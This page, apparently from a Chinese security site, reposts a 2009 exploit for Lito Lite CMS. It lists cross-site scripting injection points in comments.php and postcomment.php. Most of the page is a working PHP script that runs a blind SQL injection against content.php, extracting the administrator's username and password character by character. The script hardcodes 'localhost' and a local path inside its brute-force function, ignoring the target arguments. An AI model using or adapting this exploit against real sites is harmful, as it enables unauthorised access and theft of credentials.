首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit
来源:http://darkjokerside.altervista.org 作者:darkjoker 发布时间:2009-01-04  
#--+++===================================================================================+++--#
#--+++====== Lito Lite Multiple Cross Site Scripting / Blind SQL Injection Exploit ======+++--#
#--+++===================================================================================+++--#

# [+] XSS
# [+] comments.php?id=>[js code]
# [+] postcomment.php?id=>[js code]

#!/usr/bin/php
<?

function query ($fld, $pos, $ord)
{
$sql = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM mx_user WHERE uid = 1),{$pos},1))={$ord} OR '1' = '2";
$sql = str_replace (" ", "%20", $sql);
$sql = str_replace ("'", "%27", $sql);
return $sql;
}
function check ($host, $path, $fld, $pos, $char)
{
$fp = fsockopen ($host, 80);
$char = ord ($char);

$query = query ($fld, $pos, $char);

$req =  "GET {$path}/content.php?id={$query} HTTP1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $req);

while (!feof ($fp))
$cont .= trim (fgets ($fp, 1024));

fclose ($fp);

$x = array ();

preg_match ("/<div id=\"wrapper\">(.+?)div>/", $cont, $x);

if (strlen ($x [1]) == 2)
return false;
else
return true;
}

function brute ($host, $path, $fld, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ("localhost", "/xampp/lito_lite", $fld, $pos, $key [$chr]))
{
$res .= $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
return $res;
}

function usage ()
{
echo "[+] Lito Lite Blind SQL Injection Exploit\n".
     "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n".
     "[+] Usage: php " . $argv [0] . " <hostname> <path> [key]\n".
     "[+] Ex. php ". $argv [0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n".
     "[+] Greetz to athos, marco6\n";
exit ();
}


if (count ($argv) < 3)
usage ();

$host = $argv [1];
$path = $argv [2];
if (empty ($argv [3]))
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
else
$key = $argv [3];

echo "[+] Username: " . brute ($host, $path, "username", $key) . "\n".
     "[+] Password: " . brute ($host, $path, "password", $key) . "\n";

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Destiny Media Player 1.61 (.m3
·Destiny Media Player 1.61 (.m3
·VMware <= 2.5.1 (Vmware-authd)
·Destiny Media Player 1.61 (lst
·PHP <= 5.2.8 gd library - imag
·Webspell 4 (Auth Bypass) SQL I
·Linux Kernel 2.6.18/2.6.24/2.6
·Elecard MPEG Player 5.5 (.m3u
·PHPFootball <= 1.6 (filter.php
·Destiny Media Player 1.61 (lst
·Audacity 1.6.2 (.gro File) Lo
·Destiny Media Player 1.61 (lst
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved